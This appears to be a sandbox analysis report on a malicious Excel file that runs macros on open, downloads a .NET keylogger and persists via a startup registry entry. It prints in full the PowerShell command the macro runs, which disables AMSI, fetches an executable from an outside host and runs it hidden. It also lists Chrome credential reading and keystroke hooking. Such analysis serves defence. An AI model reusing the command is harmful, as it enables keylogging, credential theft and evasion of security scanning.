Excel File Executes PowerShell to Download/Execute .Net Key Logger

Severity	Category	Operation	Classification
4/5	Process	Creates process	-
Creates process "powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\aap6.exe') {Remove-Item $env:APPDATA + '\aap6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://3lionsfactory.ga/out/linit.exe', $env:APPDATA + '\aap6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\aap6.exe'); Stop-Process -Id $Pid -Force". ... VTI Actions Go to Function Call
Creates process "C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe". ... VTI Actions Go to Function Call
4/5	Device	Monitors keyboard input	Keylogger
Installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes. ... VTI Actions Go to Function Call
4/5	File System	Associated with malicious files	Trojan
File "c:\users\kft6utqw\desktop\share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls" is a known malicious file. ... VTI Actions Go to File Details
File "c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe" is a known malicious file. ... VTI Actions Go to File Details
4/5	Network	Downloads data	Downloader
URL "3lionsfactory.ga/out/linit.exe". ... VTI Actions Go to Function Call
URL "checkip.dyndns.org/". ... VTI Actions Go to Function Call
3/5	Network	Performs DNS request	-
Resolves host name "3lionsfactory.ga". ... VTI Actions Go to Function Call
Resolves host name "checkip.dyndns.org". ... VTI Actions Go to Function Call
3/5	Persistence	Installs system startup script or application	-
Adds "C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe" to Windows startup via registry. ... VTI Actions Go to Function Call
3/5	Browser	Reads data related to saved browser credentials	-
Reads saved credentials for "Google Chrome". ... VTI Actions Go to Function Call
3/5	Network	Checks external IP address	-
Checks external IP by asking IP info service at "checkip.dyndns.org/". ... VTI Actions Go to Function Call
3/5	PE	Executes dropped PE file	-
Executes dropped file "c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe". ... VTI Actions Go to File Details
2/5	Network	Associated with known malicious/suspicious URLs	-
URL "3lionsfactory.ga/out/linit.exe" is known as malicious URL. ... VTI Actions Go to Function Call
2/5	Network	Connects to HTTP server	-
URL "checkip.dyndns.org/". ... VTI Actions Go to Function Call
URL "3lionsfactory.ga/out/linit.exe". ... VTI Actions Go to Function Call
2/5	PE	Drops PE file	Dropper
Drops file "c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe". ... VTI Actions Go to File Details
2/5	VBA Macro	Creates suspicious COM object	-
CreateObject(NPL_IO("7470808F868D914B7085828989")) ... VTI Actions
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to Function Call
1/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro on "Activate Workbook" event. ... VTI Actions
Executes macro on "Open Workbook" event. ... VTI Actions
Executes macro on "Open Document" event. ... VTI Actions

Notifications (1/1)

Before

After